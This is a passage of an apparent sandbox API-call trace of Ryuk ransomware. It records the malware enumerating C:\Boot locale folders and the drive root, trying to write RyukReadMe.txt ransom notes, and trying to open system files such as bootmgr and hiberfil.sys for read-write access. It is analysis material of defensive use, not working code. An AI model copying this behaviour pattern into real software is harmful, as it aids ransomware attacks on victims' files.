FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.985] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.985] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.985] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.985] SetLastError (dwErrCode=0x0) [0160.985] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\RyukReadMe.txt" (normalized: "c:\\boot\\nl-nl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.985] GetLastError () returned 0x5 [0160.985] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.985] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.985] SetLastError (dwErrCode=0x0) [0160.985] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.985] GetLastError () returned 0x5 [0160.985] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.985] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.986] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.986] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.986] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.986] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.986] SetLastError (dwErrCode=0x0) [0160.986] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\RyukReadMe.txt" (normalized: "c:\\boot\\pl-pl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.986] GetLastError () returned 0x5 [0160.986] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.986] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.986] SetLastError (dwErrCode=0x0) [0160.986] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.986] GetLastError () returned 0x5 [0160.986] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.986] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.986] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.986] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.987] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.987] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.987] SetLastError (dwErrCode=0x0) [0160.987] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\RyukReadMe.txt" (normalized: "c:\\boot\\pt-br\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.987] GetLastError () returned 0x5 [0160.987] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.987] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.987] SetLastError (dwErrCode=0x0) [0160.987] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.987] GetLastError () returned 0x5 [0160.987] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.987] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.987] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.987] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.987] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.987] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.987] SetLastError (dwErrCode=0x0) [0160.987] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\RyukReadMe.txt" (normalized: "c:\\boot\\pt-pt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.987] GetLastError () returned 0x5 [0160.988] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.988] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.988] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.988] SetLastError (dwErrCode=0x0) [0160.988] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.988] GetLastError () returned 0x5 [0160.988] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.988] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.988] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.988] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.988] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.988] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.988] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.988] SetLastError (dwErrCode=0x0) [0160.988] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\RyukReadMe.txt" (normalized: "c:\\boot\\ru-ru\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.988] GetLastError () returned 0x5 [0160.988] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.988] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.988] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.988] SetLastError (dwErrCode=0x0) [0160.988] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.989] GetLastError () returned 0x5 [0160.989] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.989] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.989] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.989] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.989] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.989] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.989] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.989] SetLastError (dwErrCode=0x0) [0160.989] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\RyukReadMe.txt" (normalized: "c:\\boot\\sv-se\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.989] GetLastError () returned 0x5 [0160.989] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.989] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.989] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.989] SetLastError (dwErrCode=0x0) [0160.989] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.989] GetLastError () returned 0x5 [0160.989] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.989] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.989] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.990] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.990] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.990] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.990] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.990] SetLastError (dwErrCode=0x0) [0160.990] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\RyukReadMe.txt" (normalized: "c:\\boot\\tr-tr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.990] GetLastError () returned 0x5 [0160.990] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.990] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.990] SetLastError (dwErrCode=0x0) [0160.990] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.990] GetLastError () returned 0x5 [0160.990] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.990] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.990] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.990] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.991] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.991] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.991] SetLastError (dwErrCode=0x0) [0160.991] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\RyukReadMe.txt" (normalized: "c:\\boot\\zh-cn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.991] GetLastError () returned 0x5 [0160.991] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.991] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.991] SetLastError (dwErrCode=0x0) [0160.991] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.991] GetLastError () returned 0x5 [0160.991] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.991] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.991] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.991] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.991] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.991] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.991] SetLastError (dwErrCode=0x0) [0160.991] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\RyukReadMe.txt" (normalized: "c:\\boot\\zh-hk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.992] GetLastError () returned 0x5 [0160.992] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.992] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.992] SetLastError (dwErrCode=0x0) [0160.992] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.992] GetLastError () returned 0x5 [0160.992] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.992] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.992] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.992] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.992] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.992] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.992] SetLastError (dwErrCode=0x0) [0160.992] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\RyukReadMe.txt" (normalized: "c:\\boot\\zh-tw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.992] GetLastError () returned 0x5 [0160.992] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.992] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0 [0160.992] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0160.992] SetLastError (dwErrCode=0x0) [0160.992] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.993] GetLastError () returned 0x5 [0160.993] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.993] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.993] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.993] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x80) returned 0 [0160.993] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.993] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.993] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.993] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.994] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x80) returned 0 [0160.994] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.994] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.994] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.994] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.994] SetLastError (dwErrCode=0x0) [0160.994] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.994] GetLastError () returned 0x5 [0160.994] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.994] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.994] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0160.994] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.994] SetLastError (dwErrCode=0x0) [0160.994] CreateFileW (lpFileName="C:\\Config.Msi\\RyukReadMe.txt" (normalized: "c:\\config.msi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.994] GetLastError () returned 0x5 [0160.994] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.995] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.995] SetLastError (dwErrCode=0x0) [0160.995] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.995] GetLastError () returned 0x5 [0160.995] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.995] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0160.995] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.995] SetLastError (dwErrCode=0x0) [0160.995] CreateFileW (lpFileName="C:\\Documents and Settings\\RyukReadMe.txt" (normalized: "c:\\documents and settings\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.995] GetLastError () returned 0x5 [0160.995] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.995] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.995] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.995] SetFileAttributesW (lpFileName="C:\\hiberfil.sys", dwFileAttributes=0x80) returned 0 [0160.995] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.996] VirtualFree 